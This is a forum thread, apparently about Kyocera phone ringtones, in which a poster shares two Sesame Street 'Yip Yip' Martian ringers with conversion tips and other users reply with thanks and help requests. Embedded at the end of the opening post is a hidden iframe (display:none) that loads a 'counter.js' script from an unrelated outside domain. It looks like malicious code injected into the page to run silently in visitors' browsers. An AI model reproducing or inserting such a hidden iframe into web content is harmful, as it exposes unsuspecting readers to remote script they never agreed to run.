Sesame Street Yip Yips - BRRRRRIIIIINNNNGGGG

Lots of you have been asking for it, so I searched for over an hour tonight looking for a wav file somewhere on the net that contained the Sesame Street Aliens (Joe and Bob Martian) meeting the telephone. I finally found it thanks to the Yahoo Group for Yip Yips (yes, someone actually created a group for these scary and disturbing aliens). This turned out to be a conversion of a conversion of a conversion! It was originally a WMA file. I converted it to a WAV, edited it, then converted it to MP3... then converted it to the Kyocera ringer. So without further delay, here are the Martians doing their infamous BRRRRRRIIIIINNNNNNNNNGGGGG!

I made 2 ringers:

- The first one starts with the phone ringing, then has the 2 martians saying "yip yip yip yip yip yip ooooooh brrrrrriiiiiinnnnnngggg brrrrrriiinnnngggg".
- The second ringer is just the 2 martians saying "brrrrrriiiiiinnnnnngggg brrrrrriiinnnngggg".

Download the ringers below. If you want to hear them before uploading them to your 7135, just rename them from .pdb to .mp3 and they should play in WinAMP (or your MP3 player). Be sure to rename them back to .pdb before synching.

Yip Yip Yip Uh Huh Uh Huh (Martian for "Enjoy the Ringer")!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Could you possibly post the entire clip, or maybe a link to it? I would like to tweak it a bit. Please.:p

Awright, I found the entire file (I joined the Yahoo group!), anyway, how do you convert a WMA to an MP3?

Great ringer! This one was just too good to pass up. I've been using a 1940's style ringer most of the time, but I'm going to enjoy this one for a while. Thanks!

Worth the price of the phone

That was just too much! I have tears in my eyes from laughing. Amazing... worth the price of the phone to see anyone's reaction to that ringer.

THANK YOU!

just wanted to bring this back to the surface for any newbies to the forum
the old-fashioned ringer itself is amazing, but when the yip-yips start chiming in...sometimes my calls go through to voice mail because i'm too busy laughing at my ringer to answer

I trimmed the two rings at the start so that I could get more of the aliens up front (my voice mail was kicking in too soon). I don't know why the MP3 editor I'm using made the file so big, but here it is.

I don't have a pda phone, just a Samsung A650 cell phone. I use DataPilot software to upload ringtones to my phone.

It supports importing from MIDI, RTTL, iMelody, eMelody, and Kyocera KWS files.

Anybody know how to get the yip yips into one of those formats?

Thanks.

The Yip Yip Ringer is quite possibly the best thing I've ever heard.
I need help figuring out how to download it onto my motorola v160... it's just the basic cingular model. Tech help please!
